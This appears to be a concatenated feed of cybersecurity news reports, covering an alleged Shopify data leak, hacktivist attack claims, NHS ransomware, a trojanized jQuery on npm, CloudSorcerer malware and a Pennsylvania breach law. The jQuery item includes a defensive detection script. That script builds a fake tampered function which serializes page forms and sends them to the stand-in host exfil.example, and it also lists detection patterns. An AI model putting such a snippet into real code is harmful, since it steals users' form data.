E-commerce supplier Shopify has confirmed that it did not experience a cyber security incident but stated that a data loss was caused by a third-party app. The Shopify data breach was reportedly carried out by a known threat actor, operating under the alias ‘888’, on the dark web marketplace BreachForums.

Shopify Inc. is a Canada-based multinational business that offers a proprietary e-commerce platform along with integrations that allow individuals, retailers and other businesses to set up their own online stores or retail point-of-sale websites. Denying that a data breach took place from its own systems, Shopify released a statement to multiple media outlets which read, “Shopify systems have not experienced a security incident. The data loss reported was caused by a third-party app. The app developer intends to notify affected customers.” The company, however, did not give details of the cybersecurity incident it was referring to, the name of the third-party app, or the number of impacted individuals.

Recent Claim of Shopify Data Breach

While Shopify did not elaborate on the cybersecurity incident, the statement could be referring to the recent data breach which allegedly took place on July 4, 2024. Threat actor ‘888’ has allegedly shared stolen data from Shopify on BreachForums consisting of personal details, email subscriptions and order-related information of its users.

[Image: Source: BreachForums]

The threat actor claimed to have carried out a data breach containing 179,873 rows of user information. These records apparently include Shopify ID, First Name, Last Name, Email, Mobile, Orders Count, Total spent, Email subscriptions, Email subscription dates, SMS subscription, and SMS subscription dates. The hacker, 888, had previously been linked to multiple high-profile data breaches including Credit Suisse, Accenture India, Shell, Heineken, and UNICEF.

The breach could possibly have stemmed from a recent data breach incident impacting Evolve Bank and Trust. Evolve Bank and Trust is a supporting partner of Shopify Balance, a money management integration built into the admin pages of Shopify stores. The bank is also a third-party issuer of Affirm debit cards.

Evolve Bank and Trust Data Breach Linked to Shopify?

Towards the end of June, Evolve Bank confirmed that it had been impacted by a cybersecurity incident claimed by LockBit. The bank disclosed that the stolen data included sensitive personal information such as names, social security numbers (SSNs), dates of birth, and account details, among other data.

[Image: Source: X.com (@lvdeeaz)]

In an official statement on the alleged Evolve data breach, the bank said, “Evolve is currently investigating a cybersecurity incident involving a known cybercriminal organization that appears to have illegally obtained and released on the dark web the data and personal information of some Evolve retail bank customers and financial technology partners’ customers (end users).”

Later, the financial firm Affirm Holdings confirmed that it had also been affected by the Evolve Bank and Trust data breach. The firm stated in a security notice on its website, “Affirm is aware of a cybersecurity incident involving Evolve, a third party vendor that serves as an issuing partner on the Affirm Card. We are actively investigating the issue. We will communicate directly with any impacted consumers as we learn more.”

Given the severity of the data breach, Shopify customers must be vigilant and guard against phishing attempts and identity theft. They should adopt healthy cyber practices including monitoring their accounts for unusual activity, changing passwords, enabling two-factor authentication and being wary of phishing emails and messages requesting personal information.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
The infamous ransomware group NoName has allegedly launched cyberattacks on MitID, the Finland Chamber of Commerce, and OP Financial Group. The group took to a dark web forum to announce their actions, framing them as retaliation against Denmark and Finland's recent military and infrastructural initiatives supportive of NATO.

In a post filled with both defiance and threat, NoName stated: "Denmark has trained the first 50 Ukrainian specialists in servicing F-16 fighter jets, Commander of the Danish Air Force Jan Dam said in an interview with TV2. Most of the specialists have already returned to Ukraine to prepare for the reception of F-16s at local air bases. The training of the first group of Ukrainian pilots continues in Denmark."

The message did not stop at Denmark. It continued with a pointed statement about Finland's recent activities: "Finland has begun repairing roads and bridges in Lapland to prepare for the deployment of NATO troops on its territory. ERR.EE reports on its change of stance on NATO forces and planned infrastructure work."

NoName concluded with a chilling warning: "As you can see, the Russophobic authorities of these countries have not learned the lessons of the past. Therefore, we decided to clearly show what such initiatives lead to."

[Image: Source: X]

[Image: Source: X]

Background of the Allegedly Targeted Companies

MitID: MitID is Denmark's new digital identification system, replacing NemID. It is an essential component of Denmark's digital infrastructure, allowing citizens and businesses to access various public and private services securely. An attack on this system could potentially disrupt countless services and erode trust in the nation's digital security.

Finland Chamber of Commerce: The Finland Chamber of Commerce plays a critical role in supporting Finnish businesses, fostering economic growth, and promoting international trade. A cyberattack on the Finland Chamber of Commerce could aim to destabilize economic activities and undermine business confidence.

OP Financial Group: As Finland's largest financial services group, OP Financial Group's services range from banking to insurance. A cyberattack here could have severe ramifications, potentially affecting millions of customers, disrupting financial transactions, and causing significant economic damage.

When The Cyber Express Team accessed the official websites of the targeted companies, they appeared fully functional, showing no signs of foul play. To verify further, The Cyber Express Team reached out to the targeted companies. However, as of the time of writing this report, no official response has been received, leaving the claim unverified.

The Reason Behind the NoName Attack

The timing and targets of these cyberattacks are no coincidence. They align closely with recent developments in Denmark and Finland's military and infrastructural commitments to NATO, particularly regarding support for Ukraine amidst its ongoing conflict with Russia. Denmark's training of Ukrainian specialists in F-16 fighter jet maintenance marks a significant step in bolstering Ukraine's military capabilities. This initiative underscores Denmark's commitment to supporting Ukraine, which has been under sustained aggression from Russia since the 2014 annexation of Crimea and the more recent 2022 invasion. Finland's decision to repair roads and bridges in Lapland for NATO troop deployment signals a notable shift in its defense strategy. Since joining NATO, Finland has taken several steps to align its infrastructure and military readiness with NATO standards, a move likely aimed at deterring Russian aggression in the region.

To Sum Up

NoName's actions exemplify the increasing use of cyber warfare as a tool for political and military coercion. These attacks are designed to cause immediate disruption and send a message of deterrence and retaliation. Targeting critical national infrastructure and prominent institutions highlights the vulnerabilities modern societies face in the digital age. The cyberattacks claimed by NoName against Danish and Finnish institutions remain unverified. The Cyber Express Team is closely monitoring the situation and will update its readers as more information or responses from the allegedly targeted companies become available.
A leading cybersecurity expert has issued a warning that the National Health Service (NHS) remains highly vulnerable to cyberattacks unless significant updates are made to its computer systems. This comes in the wake of a major ransomware attack that has severely disrupted healthcare services across London.

Professor Ciaran Martin, the founding CEO of the UK's National Cyber Security Centre (NCSC), shared his concerns in an interview with the BBC. "I was horrified, but not completely surprised. Ransomware attacks on healthcare are a major global problem," Prof. Martin stated. Despite NHS England’s investment of £338 million over the past seven years to enhance cybersecurity resilience, Prof. Martin’s warnings suggest that more urgent and extensive actions are necessary to protect the NHS from future threats.

On June 3, 2024, a cyberattack targeted Synnovis, a pathology testing organization, severely affecting services at Guy's, St Thomas', King's College, and Evelina London Children's Hospitals. NHS England declared it a regional incident, resulting in the postponement of 4,913 acute outpatient appointments and 1,391 operations. The cyberattack raised significant data security concerns and has been described as one of the most severe cyber incidents in British history.

The Attackers and Their Demands

The Russia-based hacking group Qilin, believed to be part of a Kremlin-protected cyber army, claimed responsibility for the attack. They demanded a £40 million ransom, which the NHS refused to pay. Consequently, the group published stolen data on the dark web, reflecting a growing trend of Russian cybercriminals targeting global healthcare systems.

Prof. Martin, now a professor at the University of Oxford, highlighted three critical issues facing NHS cybersecurity: outdated IT systems, the need to identify vulnerable points, and the importance of basic security practices. "In parts of the NHS estate, it's quite clear that some of the IT is out of date," he noted. He emphasized the necessity of identifying "single points of failure" in the system and implementing better backups. Improving basic security measures could significantly hinder attackers. "Those little things make the point of entry quite a lot harder for the thugs to get in," Prof. Martin added.

Front-line Staff Concerns

Concerns among front-line staff are mounting in the wake of the recent cyberattacks. Many have pointed to outdated equipment and a lack of unified systems as major vulnerabilities. A senior intensive care doctor in London remarked, "The NHS is vulnerable. It's a patient safety issue, but there's no interest in addressing it." An A&E consultant in north London highlighted the use of "decade-old computers and Windows 7," noting that systems crash "every few months."

A junior doctor expressed concerns over the risks posed by outdated equipment and the impact of privatization. "Old computers pose a security risk for patient data. The Synnovis incident shows how vulnerable we are," the doctor said. A senior orthopedic surgeon described the fragmented nature of NHS IT systems, where a patient’s X-ray in one hospital cannot be accessed in another. "It's shocking and worrying for cybersecurity," he said.

Dr. Daniel Gardham from the Surrey Centre for Cyber Security echoed Prof. Martin’s concerns, emphasizing the link between outdated systems and cyberattacks. "If you have old computers, then simply put, there's going to be unpatched vulnerabilities," Dr. Gardham explained. He stressed that while sophisticated attacks do occur, many breaches result from basic security oversights. "It could be something really, really, simple and actually most likely it is something very, very, simple. It would be one person, perhaps, that had a weak password or left their computer unattended in a cafe."

NHS England’s Response

An NHS England spokesperson told the BBC, "We are increasing cyber resilience across the NHS and over £338 million has been invested over the past seven years to help keep health and care organizations as safe as possible. Our ambitious Cyber Improvement Programme will support the NHS to respond to the changing cyber threats, expand protection, and reduce the risk of a successful attack."

As cyber threats continue to evolve, the NHS must prioritize these updates to safeguard patient data and ensure the continuity of critical healthcare services. The collective insights from cybersecurity experts and front-line staff highlight the pressing need for immediate and sustained action to protect the NHS from future cyber threats.
By Neelesh Kripalani, Chief Technology Officer, Clover Infotech

In today’s dynamic financial landscape, institutions are leveraging next-gen enterprise AI platforms to revolutionize operations, drive innovation, and deliver superior customer experiences. These cutting-edge solutions are not just tools; they are catalysts for transformation, empowering financial institutions to navigate complexities, mitigate risks, and seize opportunities in an increasingly digital world.

At the heart of this revolution are advanced new-age technologies integrated into robust enterprise platforms tailored to the unique needs of the financial sector. These platforms enable institutions to harness the power of data by optimizing processes, unlocking insights, and enhancing decision-making across functions ranging from risk management and fraud detection to customer service and personalized offerings.

By Leveraging Next-gen AI Platforms, Financial Institutions Can

Enhance Operational Efficiency - AI-driven automation streamlines manual processes, reduces errors, and accelerates workflows, enabling institutions to operate more efficiently and cost-effectively.

Augment Decision-Making - AI-powered analytics provide real-time insights into market trends, customer behavior, and risk factors, empowering decision-makers with relevant information to make informed decisions swiftly.

Mitigate Risks - Advanced AI algorithms enhance risk analysis, enabling institutions to proactively identify and mitigate potential risks, fraud, and compliance issues, safeguarding assets and reputation.

Personalize Customer Experiences - AI-driven personalization enables institutions to deliver tailored products, services, and recommendations based on individual preferences and behavior, enhancing customer engagement and loyalty.

Drive Innovation - AI platforms foster a culture of innovation by enabling rapid prototyping, experimentation, and iterative development of new products, services, and business models, fostering competitiveness and market leadership.

The Future: Challenges and Opportunity

Next-gen AI platforms enable financial institutions to undertake informed decision-making, enhance operational efficiency, personalize customer experiences, and improve regulatory compliance. However, these opportunities come with challenges such as privacy and security concerns, ethical and bias issues, integration with legacy systems, skill and knowledge gaps, and regulatory uncertainties. To navigate these, institutions should invest in cybersecurity, promote ethical AI practices, upgrade infrastructure, and focus on talent development.

In conclusion, next-gen enterprise AI platforms are not just technology solutions; they are strategic enablers that empower financial institutions to thrive in an increasingly competitive and digital environment. By embracing these platforms, institutions can unlock new opportunities, drive growth, and deliver unparalleled value to customers.
The Russian Cyber Army Team has claimed responsibility for targeting the website of Telecom Liechtenstein. This alleged Liechtenstein cyberattack was announced in a post where the group declared: "Good morning Cyber Army! Let's send a small and modest greeting to Liechtenstein from our team. Let's start with the provider."

Upon accessing the official website of Telecom Liechtenstein, The Cyber Express Team encountered a 504 error, indicating that the site was down. This error typically means that the server did not receive a timely response from an upstream server it was attempting to communicate with, causing the site to become unavailable.

In an effort to verify the claim, The Cyber Express Team attempted to reach out to the targeted firm. However, they faced difficulties in finding a direct contact at Telecom Liechtenstein. Despite these challenges, the team is persistently trying to establish contact to gain clarity on the situation.

[Image: Source: X]

Liechtenstein Cyberattack: Potential Technical Issues

While the website's downtime could be due to a technical issue, the absence of any official communication from Telecom Liechtenstein makes it challenging to confirm the exact cause. Without a statement from the company, it remains speculative whether the downtime is the result of a cyberattack on Liechtenstein or an unrelated technical glitch.

Should the Russian Cyber Army’s claim be substantiated, the implications could be significant. A successful cyberattack on a major telecom provider like Telecom Liechtenstein could disrupt essential services, compromise sensitive data, and highlight vulnerabilities within the country's digital infrastructure. Such an incident would not only affect Telecom Liechtenstein but could also have broader repercussions for other businesses and services reliant on its network.

This alleged Liechtenstein cyberattack fits into a larger pattern of cyberattacks attributed to Russian cyber groups. These groups have been increasingly active, targeting various entities across the globe. The motivations behind these cyberattacks often range from political to economic, and they serve to showcase the attackers' capabilities while instilling fear and uncertainty.

To Wrap Up

As of now, the claim by the Russian Cyber Army remains unverified. The Cyber Express Team continues to monitor the situation closely and is actively trying to get in touch with Telecom Liechtenstein for an official response. This story is developing, and The Cyber Express Team is committed to providing updates to its readers as more information becomes available.
A trojanized version of jQuery has been spreading on the npm JavaScript package manager, GitHub and elsewhere, for use in a jQuery attack, security researchers have discovered.

Phylum researchers said they have been monitoring the “persistent supply chain attacker” since May 26, initially on npm, “where we saw the compromised version published in dozens of packages over a month. After investigating, we found instances of the trojanized jQuery on other platforms, such as GitHub, and even as a CDN-hosted resource on jsDelivr.”

The malicious packages can extract website form data and send it to one of many URLs. In all, the researchers observed 68 malicious packages across 33 domains, which they listed in a blog post.

Because they contain so much widely used open source code, platforms like npm and GitHub are an attractive place for threat actors to try to distribute malicious code, or to hijack legitimate projects to launch supply chain attacks.

jQuery Attack Shows ‘High Variability’

The researchers said the jQuery attack “is unlike most we've seen at this scale, which typically have a clear, well-defined pattern and an obvious automated aspect. Here, the ad-hoc nature and custom variability of the packages, along with the long timeframe over which they were published, suggest that each package was manually assembled and published.”

The published packages were "relatively minimal," they said, and the attacker included at least one complete copy of jQuery, often named jquery.min.js, along with other variations such as registration.min.js, icon.min.js, and fontawesome.js. The exfiltration URLs were typically unique for each package. The attacker published to npm under new usernames, although a single user would occasionally publish multiple related packages. The attacker occasionally included multiple file versions with different names within the same project.

“Interestingly, almost every package also contained personal files not typically included in npm publications, such as the npm cache folder, npm logs folder, and a termux.properties file,” the Phylum researchers said.

How the jQuery Attack Works

Each malicious package contained a copy of jQuery with one small difference, the researchers said: the end function, a part of the jQuery prototype, was modified to include additional malicious code. The attacker “has cleverly hidden the malware in the seldom-used end function of jQuery, which is internally called by the more popular fadeTo function from its animation utilities,” they wrote.

The end method is used to end the most recent filtering operation in the current chain and return the set of matched elements to its previous state. The example of the unaltered end method code they provided is pretty simple:

[Image: Normal jQuery end function (source: Phylum)]

In a malicious example the researchers shared, the code is significantly more complex:

[Image: jQuery attack altered end function (source: Phylum)]

They noted that the attacker is firing off a non-blocking GET request via $.ajax to a remote URL, which includes a query parameter constructed by serializing all form data on the page ($("form").serialize()) and then encoding it into a hex string. “This means that if you’re using this trojanized version, all form data on the page is exfiltrated any time the end function is called,” they wrote.

Developers Should Be Cautious with Packages

For the malware to be triggered, the researchers noted that a user must install one of the malicious packages, use the included trojanized jQuery file, and then invoke either the end function or the fadeTo function. “This specific chain of conditions makes it unclear whether this is a highly targeted attack or if the attacker is simply blending in well and randomly affecting users who download and use these packages,” they said.

“The sheer number of packages, the variability in naming conventions, and the inclusion of personal files within these packages raise questions about the attacker’s capabilities and intentions,” they said. “These factors contrast sharply with the more sophisticated nature of the actual malware itself and the effort taken to conceal its maliciousness in plain sight.

“Despite the narrow set of conditions required to trip the malware, the broad distribution of the packages means the potential impact is wide, potentially affecting many unsuspecting developers. This novel attack exemplifies the rising complexity and potential for the broad reach of supply chain threat actors.”

For developers, supply chain threats like these mean they must be careful to download packages only from trusted sources and to update and patch regularly. Verifying package signatures and using package security tools can also help ensure the security of their projects.
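The two signals described above (network or form-serialization code inside jQuery's otherwise trivial `end` method, and stray personal files such as termux.properties bundled in a package) can be checked mechanically. The following is an added example written for this article, not code from Phylum or from the original report; `extractEndMethod`, `auditJqueryEnd` and `oddPackageFiles` are names chosen here, the sample jQuery snippets are constructed, and the npm cache/log paths are assumed defaults.

```javascript
// Added example (not from the article or Phylum): static audit of a jQuery-style
// source string for a tampered `end` method, plus a check for files that should
// never ship in an npm package. All sample inputs are constructed.

// Patterns that have no business inside jQuery's `end` method.
const SUSPICIOUS_PATTERNS = [
  /\.ajax\s*\(/,          // $.ajax / jQuery.ajax
  /\bXMLHttpRequest\b/,
  /\bfetch\s*\(/,
  /navigator\.sendBeacon/,
  /\.serialize\s*\(/,     // $("form").serialize()
  /\bnew\s+Image\s*\(/,   // image-beacon style requests
];

// Extract the full text of the `end` method, whether minified (`end:function(){...}`)
// or pretty-printed (`end: function () {`), by matching braces and skipping string
// literals. Requires the `end:` property form, so ordinary `.end()` calls elsewhere
// in the file are ignored. Returns null if absent or if braces are unbalanced.
function extractEndMethod(source) {
  const m = /\bend\s*:\s*function\s*\([^)]*\)\s*\{/.exec(source);
  if (!m) return null;
  let depth = 0;
  let inString = null;
  for (let i = m.index + m[0].length - 1; i < source.length; i++) {
    const ch = source[i];
    if (inString) {
      if (ch === '\\') { i++; continue; }   // skip escaped character
      if (ch === inString) inString = null;
      continue;
    }
    if (ch === '"' || ch === "'" || ch === '`') { inString = ch; continue; }
    if (ch === '{') depth++;
    else if (ch === '}' && --depth === 0) return source.slice(m.index, i + 1);
  }
  return null;
}

// Audit one jQuery source string. A genuine `end` only touches prevObject and
// constructor, so any pattern hit (or an oversized body) deserves a manual look.
function auditJqueryEnd(source) {
  const method = extractEndMethod(source);
  if (method === null) return { found: false, suspicious: false, reasons: [] };
  const reasons = SUSPICIOUS_PATTERNS.filter((re) => re.test(method)).map((re) => re.source);
  if (method.length > 200) reasons.push(`end() is ${method.length} chars; the genuine one is about 60`);
  return { found: true, suspicious: reasons.length > 0, reasons, method };
}

// Second signal from the article: personal files that do not belong in a published
// package. The npm cache/log folder names are assumed defaults.
const ODD_PACKAGE_FILES = [/(^|\/)\.npm\//, /(^|\/)_logs\//, /(^|\/)termux\.properties$/];
function oddPackageFiles(fileList) {
  return fileList.filter((f) => ODD_PACKAGE_FILES.some((re) => re.test(f)));
}

// Constructed samples: a genuine-looking `end` and a fake tampered one that mirrors
// the behaviour described in the article (serialize forms, hex-encode, GET to a URL).
const CLEAN_END = 'end:function(){return this.prevObject||this.constructor()}';
const TROJAN_END =
  'end:function(){var d=$("form").serialize();' +
  '$.ajax({url:"https://exfil.example/?q="+toHex(d)});' +
  'return this.prevObject||this.constructor()}';
const GOOD_JQUERY =
  'jQuery.fn=jQuery.prototype={first:function(){return this.eq(0)},' +
  CLEAN_END + ',last:function(){return this.eq(-1)}};';
const BAD_JQUERY = GOOD_JQUERY.replace(CLEAN_END, TROJAN_END);

if (typeof require !== 'undefined' && require.main === module) {
  console.log('clean copy:', auditJqueryEnd(GOOD_JQUERY));
  console.log('tampered copy:', auditJqueryEnd(BAD_JQUERY));
  console.log('odd files:', oddPackageFiles(['package.json', 'jquery.min.js', '.npm/_logs/2024.log', 'termux.properties']));
}
```

Run it against the jquery*.js files pulled from a package tarball (and the tarball's file list) before the package is allowed into a build; a hit is a reason to diff the file against the official jQuery release of the same version.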
Gaborone, Botswana: TraiCon Events will host Botswana’s premier cybersecurity event, titled “Cyber Revolution Summit”, on 9th August 2024 in Gaborone, Botswana. The summit will feature keynote presentations and panel discussions with top security experts from various industries, covering a range of topics including cybersecurity innovations, data privacy & security, risk management, network security, threat detection & intelligence, and vulnerability management.

Cyber Revolution Summit: A Networking Opportunity

The summit is an indisputable platform for public & private alliances, aiming to bring together 500+ pre-qualified CISOs, CIOs, heads of cyber security, digital transformation, IT infrastructure, information and communication technologies, and other experts in the domain to discuss the potential and recent trends of cybersecurity. Many system integrators, IT security solution providers, cybersecurity companies, cloud & data security, threat management, cyber software, and cybercrime companies will participate in the Cyber Revolution Summit as Sponsors or Exhibitors, showcasing their solutions for the future of cyberspace.

Join us in Botswana as it leads the way to the future at the Cyber Revolution Summit. For more information regarding the event, please visit: https://cyber.traiconevents.com/bw/

For event inquiries: Eng. Prasanna | Event Producer | Traicon Events
prasanna@traiconevents.com | +0091 7708523918
Security researchers discovered a new sophisticated cyberespionage tool targeting Russian government entities in May 2024. The tool, dubbed CloudSorcerer, exploits popular cloud infrastructure services such as Microsoft Graph, Yandex Cloud and Dropbox for use as command and control (C2) servers for stealth monitoring, data collection and exfiltration operations.

Technical Details of the CloudSorcerer Campaign

Researchers from Kaspersky believe that a new APT group is behind the CloudSorcerer malware. The malware is a single Portable Executable (PE) binary written in C that adjusts its functionality depending on the process from which it is executed. Upon execution, the malware calls the GetModuleFileNameA function to determine the name of the process from which it has been run and then compares that process name against a set of hardcoded strings identifying browsers, mspaint.exe, and msiexec.exe. The malware activates different functions depending upon the identified process name:

- In mspaint.exe: acts as a backdoor within the program to collect data and execute code.
- In msiexec.exe: initiates C2 communication.
- In a browser or any other detected process: injects shellcode into targeted processes before terminating.

The malware's backdoor module begins by collecting system information about the victim machine while running in a separate thread. This information includes computer name, user name, Windows subversion information, and system uptime. All the collected data is stored in a specially created structure. Once information gathering is complete, the data is written to the named pipe .PIPE[1428] connected to the C2 module process. It then executes various commands based on received instructions, such as gathering drive information, collecting file and folder data, executing shell commands, manipulating files, injecting shellcode into processes, and running advanced tasks like creating processes, modifying registry keys and managing network users.

These commands are specified under a unique COMMAND_ID for each operation within the malware program:

[Image: Source: securelist.com (Kaspersky)]

- 0x1 – Collect information about hard drives in the system, including logical drive names, capacity, and free space.
- 0x2 – Collect information about files and folders, such as name, size, and type.
- 0x3 – Execute shell commands using the ShellExecuteExW API.
- 0x4 – Copy, move, rename, or delete files.
- 0x5 – Read data from any file.
- 0x6 – Create and write data to any file.
- 0x8 – Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process.
- 0x9 – Receive a PE file, create a section and map it into the remote process.
- 0x7 – Run additional advanced functionality.

The researchers also observed the use of GitHub pages as C2 servers, with the C2 data stealthily hidden as hex code within the author section of the profile. These profiles contained forks of public legitimate code repositories, without any modification, to appear legitimate. The same hex string was also observed hidden within the names of public photo albums hosted on the Russian album-sharing service https://my.mail[.]ru. Associated profiles on both services contained a photo of a male taken from a public photo bank.

[Image: Source: securelist.com (Kaspersky)]

The malware picks up hex strings from these sources, breaking them into segments that represent different instructions. The first segment of the decoded hex string indicates the cloud service the malware should use: for example, a byte value of “1” represents Microsoft Graph and byte “0” represents Yandex Cloud. The segments that follow form a string used to authenticate against the various cloud APIs, as well as a subset of functions for specific interactions with the selected cloud service.

Similarity to the CloudWizard APT Campaign

While the researchers noted similarities in the campaign's modus operandi and tactics to the previously known CloudWizard APT group, they state that the significant differences in code and functionality between the malware used by the two groups suggest that CloudSorcerer is likely the work of a newer APT developing its own unique tools.

The CloudSorcerer campaign represents the use of sophisticated operations against Russian government entities. Its use of popular cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub and MyMail photo albums for initial C2 communications, demonstrates a well-organized approach to espionage. The malware’s ability to dynamically adapt its behavior depending upon the infected process, along with its complex use of Windows pipes, further highlights its intricacy. The researchers have shared a list of indicators of compromise (IOCs) to help protect against deployment of the CloudSorcerer malware.
By Ian Thornton-Trump, CISO, Cyjax

“There are three ways to make a living in this business: be first, be smarter, or cheat.” So says Jeremy Irons’ CEO at the climactic meeting in the financial crisis drama Margin Call. “Now, I don’t cheat.” While we should be wary of taking moral lessons from someone who, in this fictionalized recounting, kickstarts the 2008 financial crash, there are those who do cheat to be better at business. Not a person, or a corporation, but the People’s Republic of China. China’s domestic market is kept strong and competitive by a strategy with hacking and cybercrime as key elements. Why does it do this, and how?

Slowing Growth

China is rightly regarded as an economic powerhouse, but there are indications that growth is slowing down. In 2020, a plan was put in place to double the size of the economy in fifteen years. But the IMF estimates that China’s GDP growth will be below 4% in the coming years, well below ambitions. Other estimates put growth as low as 3%, and likely to fall to 2% by 2030.

We can see the problem by looking specifically at the property sector, which contributes around a quarter of China’s GDP. The early 2000s saw a boom following the privatization of property, but at least 60 developers have collapsed since 2020. The most valuable real estate company in the world was ordered to liquidate in early 2024, and there are fears that others are overleveraged and may meet the same fate.

Manufacturing has also fallen. In 2023, the Purchasing Managers Index, a useful indicator of factory activity, fell for five consecutive months, then fell again after a short rise. Consumer prices are also close to deflation. It’s difficult to evaluate these figures, as there is no independent verification of Chinese government statistics, but the outlook is not as hoped. With the People’s Bank of China suggesting that it will step up policy adjustments to promote a rebound in prices, it’s safe to assume that not all is going to plan.

There are other challenges: unemployment figures were high, at least until June 2023, when publication ceased. Jobs for university graduates are scarce, and salaries are down. There is also a demographic problem in the offing, with low birth rates despite the abolishment of the One Child Policy in 2015. China is faced with a problem many countries are facing—an aging population supported by a declining workforce.

In short: the Chinese economy is struggling. But that isn’t holding back its sophistication when it comes to cyber espionage.

The Secret Ingredient is Cybercrime

China has used cyber capabilities to further its interests since at least 2006. In the popular imagination, this is used to “disrupt the west”, and there is some truth in this. For example, it was reported last year that hackers had infiltrated water utilities, oil pipelines, and ports. These attacks were, according to some, state-backed Chinese hackers targeting US critical infrastructure in order to lay the technical groundwork for the disruption of communications between the US and Asia during future crises.

But there is more to these hacking attempts than disruption. It’s often about information, specifically business information that can help support the Chinese economy. There have been several high-profile examples of this type of attack linked to China. Operation Soft Cell targets internet-facing Microsoft Exchange servers, particularly in the telecoms, financial, and government sectors, in an attempt to steal information. Sandman delivers malware in an attempt to subvert systems. Volt Typhoon in particular targets organisations with the intent of gathering information.

China’s approach to cybercrime is not just to disrupt, but to steal information that can further its economic interests. It is pursuing a strategy of extracting technologies from Western companies, which it can then put to use. This is backed up by creating a protected domestic market—by using subsidies and nontariff barriers to build national leaders, China has an advantage as it competes globally. The control of businesses in China is highly regulated, making it difficult for foreigners to control businesses or for foreign-owned businesses to operate within the country. This protectionism could easily mean that Chinese businesses would find it difficult to be competitive in an international market, but the use of cybercrime to steal information helps to redress the balance.

Expect More of the Same

According to the security think tank CSIS, China has carried out a twenty-year campaign of cyber and non-cyber espionage, the result described by General Keith Alexander as a theft of industrial information and intellectual property through cyber espionage which constitutes the “greatest transfer of wealth in history.” The head of the Australian Security Intelligence Organisation has described China’s approach to cyber espionage as “well beyond traditional espionage and…the most sustained, scaled and sophisticated theft of intellectual property and acquisition of expertise that is unprecedented in human history”.

China’s current economic woes are only likely to make the problem worse. As growth targets are missed and deflation becomes a real possibility, it’s very likely that we will see official policies that aim to address the problem—along with an increase in sanctioned but unofficial cyber espionage.

This year, we’re likely to see disruptive activity from China-affiliated threat groups, especially with so many elections taking place across the globe. Nation states will continue to test their cyber capabilities for disruption just as they test other defensive capabilities. But China’s cybercrime program will continue to have another aim, embracing espionage to support a growth economy, while also developing market-based economies in Africa and South America.

Disclaimer: The views and opinions expressed in this guest post are solely those of the author(s) and do not necessarily reflect the official policy or position of The Cyber Express.
Any content provided by the author is of their opinion and is not intended to malign any religion, ethnic group, club, organization, company, individual, or anyone or anything.
A recently passed Pennsylvania law aims to bolster consumer protections in the aftermath of data breaches. Act 33 of 2024, which is set to take effect in late September of this year, mandates stricter time limits for organizations to issue data breach notices and free provision of credit monitoring to affected individuals in the event of a data breach.

Key Provisions of Act 33 Pennsylvania Law

Under the provisions of the new law, organizations must notify the Pennsylvania Attorney General's Office if a data breach is found to affect more than 500 residents within the state of Pennsylvania. (Source: www.legis.state.pa.us)

The notice is required to include the following details:

(1) The organization name and location.
(2) The date of the breach of the security of the system.
(3) A summary of the breach incident of the security of the system.
(4) An estimated total number of individuals affected by the breach of the security of the system.
(5) An estimated total number of individuals in this Commonwealth affected by the breach of the security of the system.

Along with the reporting requirements, one of the key provisions of the law is the requirement for organizations to provide free credit reports and one year of credit monitoring to all affected consumers. The law introduces a new era of protection for consumers, requiring organizations to assume all costs and fees associated with providing affected individuals with access to credit reports and credit monitoring services. This provision means that individuals from Pennsylvania will not have to pay for these services, which can provide peace of mind in the event of a data breach and add an additional layer of protection to help prevent identity theft and financial fraud.

The law defines personal information as an individual's first name or first initial and last name in combination with certain sensitive data elements, such as Social Security numbers, driver's licenses, or financial account numbers.

The law amends the act of December 22, 2005 (P.L.474, No.94), which is titled: "An act providing for security of computerized data and for the notification of residents whose personal information data was or may have been disclosed due to a breach of the security of the system; and imposing penalties," and further provides for definitions, for notification of the breach of the security of the system and for notification of consumer reporting agencies; and provides for credit reporting and monitoring. The Act 33 law received unanimous support in both chambers of the state legislature, reflecting the broad recognition of the need for stronger data protection measures.

Act Comes Amidst Geisinger Medical Center Data Breach Fallout

Reports of data breach incidents across the United States have surged in recent years, with a record of 3,122 incidents reported in 2023 nationwide – a 72% increase from the previous high in 2021. According to data from the Identity Theft Resource Center, these breaches affected hundreds of millions of Americans and resulted in billions of dollars in losses.

The new law comes in the wake of high-profile breaches like the one at Pennsylvania's Geisinger Medical Center, which potentially exposed personal information of approximately one million patients. A former employee has been arrested in connection with the data breach. Jonathan Friesen, Geisinger chief privacy officer, stated in response to the arrest, “Our patients’ and members’ privacy is a top priority, and we take protecting it very seriously.” He added, “We continue to work closely with the authorities on this investigation, and while I am grateful that the perpetrator was caught and is now facing federal charges, I am sorry that this happened.”

Disgruntled former patients of the hospital have joined in a class action lawsuit filed against Geisinger, demanding compensation. One former patient, James Wierbowski, filed a lawsuit on June 28, seeking monetary relief that could amount to more than $5 million.
Manila, Philippines - 19/06/24: TraiCon Events will be hosting the Philippines’ premier cybersecurity event, titled “Cyber Revolution Summit”, scheduled for 10th September 2024 in the Philippines. This summit will feature keynote presentations and panel discussions with top security experts from various industries, covering a range of topics including cybersecurity innovations, data privacy & security, risk management, network security, threat detection & intelligence, and vulnerability management.

Cyber Revolution Summit - A Networking Opportunity

This summit is a platform for public & private alliances, aiming to bring together 350+ pre-qualified CISOs, CIOs, heads of cyber security, digital transformation, IT infrastructure, information and communication technologies, and other experts in this domain to discuss the potential and recent trends of cybersecurity. Many system integrators, IT security solution providers, cybersecurity companies, cloud & data security, threat management, cyber software, and cybercrime companies will be participating in the Cyber Revolution Summit as Sponsors or Exhibitors, showcasing their solutions for the future of cyberspace.

Join us in the Philippines as it leads the way to the future at the Cyber Revolution Summit.

For more information regarding the event, please visit: https://cyber.traiconevents.com/ph/

For event inquiries: Eng. Prasanna | Event Producer | Traicon Events
prasanna@traiconevents.com | +0091 7708523918
Identity orchestration products are increasingly expected to enter the market in the next couple of years. This piece explores market trends and the benefits of identity orchestration.
The passwords, dumped on a cyber-underground forum on July 4 by a hacker called "ObamaCare," were collected from a variety of older and more recent breaches.
Information-stealing malware families have evolved to impersonate generative AI tools, with examples like GoldPickaxe stealing facial recognition data for deepfake videos.
The malware has evolved into multiple versions, with GootLoader 3 being the latest one in use. Despite updates to the payload, the infection strategies have remained consistent since its resurgence in 2020.
A new variation of WordFence evasion malware has been discovered, concealing backdoors in infected WordPress environments. A suspicious plugin named "wp-engine-fast-action" was found tampering with the popular WordFence security plugin.
